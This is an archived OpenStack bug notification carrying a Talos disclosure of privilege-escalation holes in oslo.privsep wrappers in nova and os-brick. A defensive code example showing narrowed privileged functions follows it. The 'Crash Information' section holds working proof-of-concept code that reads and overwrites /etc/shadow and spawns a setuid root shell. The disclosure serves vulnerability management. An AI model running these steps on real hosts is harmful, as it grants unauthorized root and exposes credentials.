
yahoo-eng-team team mailing list archive

[Bug 1989008] Re: Lax rulesets leading to privilege escalation vulnerabilities


I missed setting the security advisory task to won't fix state when we
decided on this as a security hardening opportunity, so have done so now
(as it won't have any advisory issued).

** Changed in: ossa
       Status: Incomplete => Won't Fix

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1989008

Title:
  Lax rulesets leading to privilege escalation vulnerabilities

Status in OpenStack Compute (nova):
  Triaged
Status in os-brick:
  New
Status in oslo.privsep:
  Triaged
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  [OpenStack's vulnerability managers received the following report via
  encrypted E-mail]

  ### Summary

  A privilege escalation vulnerability exists in the oslo.privsep
  functionality of OpenStack git master 05194e7618 and prior. Overly
  permissive functionality within tools leveraging this library within a
  container can lead to increased privileges.

  ### Confirmed Vulnerable Versions

  The versions below were either tested or verified to be vulnerable by
  Talos or confirmed to be vulnerable by the vendor.

  OpenStack git master 05194e7618

  ### Product URLs

  OpenStack -
  [https://opendev.org/openstack/](https://opendev.org/openstack/)

  ### CVSSv3 Score

  8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

  ### CWE

  CWE-269 - Improper Privilege Management

  ### Details

  OpenStack contains a number of tools, libraries, and services for
  providing simplified, powerful, and scalable cloud based applications.

  OpenStack's [oslo.privsep](https://opendev.org/openstack/oslo.privsep)
  library "helps applications perform actions which require more or less
  privileges ... in a safe, easy to code and easy to use manner." An
  entry in sudoers is generally added to bootstrap oslo.privsep with the
  correct privileges when run from an unprivileged user such as `nova`.

  The oslo.privsep [design
  documents](https://docs.openstack.org/oslo.privsep/latest/user/index.html)
  state the following:

      Privileged functions must be as simple, specialized and narrow as possible, so as to prevent further escalation. In this example,
      update_motd(message) is narrow: it only allows the service to overwrite the MOTD file. If a more generic update_file(filename, content) was created,
      it could be used to overwrite any file in the filesystem, allowing easy escalation to root rights. That would defeat the whole purpose of oslo.privsep.
      ...
      Provided the unprivileged<->privileged boundary contains any hole that effectively grants root to the caller, then there is little benefit to having the separation [provided by privsep]

  Two modules were observed to have functions that were overly broad and
  allowed for trivial escalation to root. The `nova`
  [module](https://opendev.org/openstack/nova/blob/master/nova/privsep/path.py)
  contains privileged wrappers for `chmod`, `chown`, `rmdir`, and
  arbitrary file create/write/move/read. Second, the os_brick
  [module](https://opendev.org/openstack/os-brick/blob/master/os_brick/privileged/rootwrap.py) contains functions
  to execute arbitrary shell commands as root. The source file contains
  the following comment from 2016:

      Just in case it wasn't clear, this is a massive security back-door. [these wrappers] allow any command to be run as the privileged user (default "root").
      This is intended only as an expedient transition and should be removed ASAP.

  Either of the above modules is sufficient to achieve privilege
  escalation to root. Other modules within OpenStack were not audited,
  but it is possible that similar issues exist elsewhere in the
  codebase.

  ### Crash Information

  ###### Method 1 (nova)

      import os
      from nova.privsep.path import *
      from oslo_config.cfg import CONF
      CONF.privsep_context = 'nova.privsep.sys_admin_pctxt'
      # Read /etc/shadow
      last_bytes("/etc/shadow", 1000)
      # Write to /etc/shadow
      writefile("/etc/shadow", "wb", b"<payload_here>")
      # Get a root shell
      os.system("cp /bin/bash /tmp/bash")
      chown("/tmp/bash", 0)
      chmod("/tmp/bash", 0o4755)
      os.system("/tmp/bash -p")
      bash-5.1#

  ###### Method 2 (os_brick)

      from os_brick.privileged.rootwrap import *
      from oslo_config.cfg import CONF
      import shlex # helpful for multi-arg commands
      CONF.privsep_context = 'os_brick.privileged.default'
      execute_root(*shlex.split("id"))
      ('uid=0(root) gid=0(root) groups=0(root)\n', '')

  ### Mitigation

  Privileged functions in the `nova` and `os_brick` modules of OpenStack
  should be rewritten to be as specialized and narrowly tailored as
  possible; e.g. `chmod(path, mode)` should be replaced with a function
  that only applies pre-defined permissions on one or more pre-defined
  files.

  Suggest auditing other modules that use oslo.privsep to identify
  similar issues.

  ### Credit

  Keane O'Kelley of Cisco ASIG

  https://talosintelligence.com/vulnerability_reports/

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1989008/+subscriptions
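The narrowing that the report's Mitigation section calls for, as an added defender's example that is not code from the bug report, nova, os-brick or oslo.privsep: the broad `chmod(path, mode)` shape next to a replacement that only applies pre-defined modes to pre-defined files, and that refuses a symlink swapped in under one of those paths. The table, the function names and the tempdir layout are assumptions made for the demo; the real `@entrypoint` decorator is left out so the code runs unprivileged.

```python
import errno
import os
import stat
import tempfile

def chmod_any(path: str, mode: int) -> None:  # lax form the report criticises
    os.chmod(path, mode)  # behind a privsep daemon: chmod-as-root on any file

# Narrow form: caller names a target; path and mode come from a fixed table.
# Hypothetical table rooted in a tempdir so the demo runs unprivileged.
ROOT = tempfile.mkdtemp(prefix="privsep-demo-")
_ALLOWED = {
    "motd": (os.path.join(ROOT, "motd"), 0o644),
    "secret_key": (os.path.join(ROOT, "key"), 0o600),
}
for _path, _ in _ALLOWED.values():
    open(_path, "w").close()

def set_predefined_mode(name: str) -> int:
    """Apply the table mode for `name`, refusing anything else. O_NOFOLLOW +
    fchmod() closes the symlink/TOCTOU hole an lstat()-then-chmod() leaves."""
    if name not in _ALLOWED:
        raise PermissionError(f"not a permitted target: {name!r}")
    path, mode = _ALLOWED[name]
    if mode & (stat.S_ISUID | stat.S_ISGID):  # the table must never grant these
        raise PermissionError("setuid/setgid bits are not allowed")
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError as exc:
        if exc.errno == errno.ELOOP:
            raise PermissionError(f"refusing symlink at {path}") from exc
        raise
    try:
        os.fchmod(fd, mode)
    finally:
        os.close(fd)
    return mode

def current_mode(name: str) -> int:
    return stat.S_IMODE(os.stat(_ALLOWED[name][0]).st_mode)

def try_set(name: str):
    """Mode applied, or None when the narrow entrypoint refuses `name`."""
    try:
        return set_predefined_mode(name)
    except PermissionError:
        return None

def swap_for_symlink(name: str, target: str) -> None:
    os.remove(_ALLOWED[name][0])  # simulate an attacker replacing the file
    os.symlink(target, _ALLOWED[name][0])
```

The same shape applies to the report's other wrappers: a privileged entrypoint should take a symbolic selector from a fixed table, never a caller-supplied path, mode, owner or command line.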